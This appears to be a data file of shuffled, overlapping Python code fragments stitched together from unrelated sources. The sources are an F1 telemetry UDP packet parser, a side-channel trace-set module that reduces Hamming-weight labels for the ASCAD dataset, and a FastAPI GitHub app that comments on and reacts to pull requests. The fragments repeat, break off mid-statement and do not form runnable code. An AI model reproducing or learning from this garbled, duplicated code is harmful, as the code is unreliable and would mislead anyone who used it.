unpacked[7],", "List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def", "struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64", "ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message:", "* len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], )", "object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class.", "ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create", "struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header", "header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each", "tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "Binary representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT +", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list =", "cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "[\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name", "class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list(", "m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str):", "( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank:", "m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\")", "dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i,", "# Get lap data for each active car data_list = list() for i", "\"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List):", "in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1)", "# Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, )", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\",", "class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear:", "each active car data_list = list() for i in range(22): data = message_type.from_unpacked(", "car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i *", "construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] )", ") @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\"," ]
[ "Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes.", "weight labels and reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight", "traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000,", "la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss,", "if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9,", "TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and", "encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType,", "4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces,", "if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__", "traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False):", "__name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att,", "# TODO replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la", "np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs],", "weight labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y,", "variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database", "0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 =", "import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x,", "from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database from", "\"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes:", "2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1,", "== '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att", "labels and reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight =", "= np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces,", "y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True) print(x2)", "to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import encode from", "is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit)", "is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces,", "replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance", "= hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit", "import encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import", "balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to 2", "la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical)", "as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace", "9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes. \"\"\"", "< 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit =", "axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit", "import numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical #", "from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl", "return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming", "notebook variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import", "encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000))", "Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y,", "2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and", "(categorical) hamming weight labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight", "tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import", "is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def", "= np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit =", "return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0),", "4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced:", "= TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack())", "4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit)", "'__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att =", "classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high =", "reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it", "= np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4", "= hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs],", "labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1)", "if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x,", "\"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs]", "2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9,", "2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4", "1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9,", "= x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit,", "la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces,", "hamming weight labels and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight =", "it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight", "PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class", "def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces", "src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\"", "= x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit,", "reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1)", "> 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces,", "balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad,", "balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import", "classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5,", "traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__':", "random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs =", "traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return", "np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random)", "hamming weight labels and reduces it to 2 classes: semi-fixed and random. \"\"\"", "src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from", "src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution", "balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class", "balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y,", "reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs =", "and reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y,", "src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook", "!= 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if", "from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False):", "np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces,", "axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces,", "traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight", "prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from", "filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced:", "and reduces it to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs", "and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs", "limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9,", "TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2,", "reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it", "hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high", "x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2)", "la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\"", "from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming", "balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ ==", "= balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes", "la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces,", "mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database", "src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def", "len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if", "<filename>src/trace_set/transform.py import numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical", "traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit = balance(traces, la_bit) return", "encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels", "import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import encode", "hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] >", "def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces", "is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if", "to 2 semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight !=", "hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit =", "Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed", "x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True)", "la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set", "it to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random", "import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw", "from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW", "semi-fixed classes. \"\"\" hamming_weight = np.argmax(y, axis=1) filter_ixs = hamming_weight != 4 is_high", "semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool)", "\"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed", "TODO replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import", "Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical)", "(categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and random.", "9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and", "trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(),", "is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit", "np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit", "import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants", "with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance from", "\"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight", "hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight <", "x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2)", "numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO", "filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit =", "= np.argmax(y, axis=1) is_random = np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4,", "from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw", "from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType, Pollution", "y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to", "np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with", "to 2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random =", "= balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set =", "Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2", "import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes", "src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight", ".5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs]", "import TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels" ]
[ "ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise", "react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions',", "get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action)", "gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh", "gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content},", "GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not", "ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(),", "= login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept':", "try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER,", "= os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI()", "@app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content) return \"Post Success\", 200", "from github3.github import GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY", "action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError:", "from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER", "Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue()", "os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()", "login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}", "= FastAPI() class ActionIn(BaseModel): content: str owner: str repository: str pr_number: int @property", "not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str", "NotFoundError, ForbiddenError from github3.github import GitHub from github3.pulls import PullRequest from pydantic import", "action).create_comment(action.content) return \"Post Success\", 200 @app.post('/reaction') def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue", "HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn) ->", "import os from fastapi import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from", "200 def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner,", "f\"Application not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number}", ") except ForbiddenError: raise HTTPException(403, f\"Application not setup for the repository {action.repo}\") except", ") return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to", "install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError:", "= gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise", "+ '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\", 200 def login_as_installation(action:", "{action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number", "str owner: str repository: str pr_number: int @property def repo(self) -> str: return", "raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def get_pr(gh, action: ActionIn)", "repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist in {action.repo}\")", "installed to {action.repo}\") def get_pr(gh, action: ActionIn) -> PullRequest: try: return gh.pull_request( owner=action.owner,", "github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER =", "None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel):", "gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id ) return gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf", "gh except NotFoundError: raise HTTPException(404, f\"OpeAPI Perf App not installed to {action.repo}\") def", "gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository) gh.login_as_app_installation( GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER, install.id", "the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist in", "content: str owner: str repository: str pr_number: int @property def repo(self) -> str:", "os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class", "PullRequest: try: return gh.pull_request( owner=action.owner, repository=action.repository, number=action.pr_number ) except ForbiddenError: raise HTTPException(403, f\"Application", "def react_to_pr(action: ActionIn): gh = login_as_installation(action) issue = get_pr(gh, action).issue() issue._post( issue._api +", "def login_as_installation(action: ActionIn): try: gh = GitHub() gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER) install = gh.app_installation_for_repository(action.owner, action.repository)", "import FastAPI, HTTPException from github3.exceptions import NotFoundError, ForbiddenError from github3.github import GitHub from", "GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None) GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None) if not GITHUB_PRIVATE_KEY: GITHUB_PRIVATE_KEY =", "for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does not exist", "-> str: return f'{self.owner}/{self.repository}' @app.post('/comment') def comment_on_pr(action: ActionIn): gh = login_as_installation(action) get_pr(gh, action).create_comment(action.content)", "github3.github import GitHub from github3.pulls import PullRequest from pydantic import BaseModel GITHUB_PRIVATE_KEY =", "str repository: str pr_number: int @property def repo(self) -> str: return f'{self.owner}/{self.repository}' @app.post('/comment')", "not setup for the repository {action.repo}\") except NotFoundError: raise HTTPException(404, f\"PR #{action.pr_number} does", "action).issue() issue._post( issue._api + '/reactions', data={\"content\": action.content}, headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'} ) return \"Post Success\",", "GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read() app = FastAPI() class ActionIn(BaseModel): content: str owner: str", "github3.exceptions import NotFoundError, ForbiddenError from github3.github import 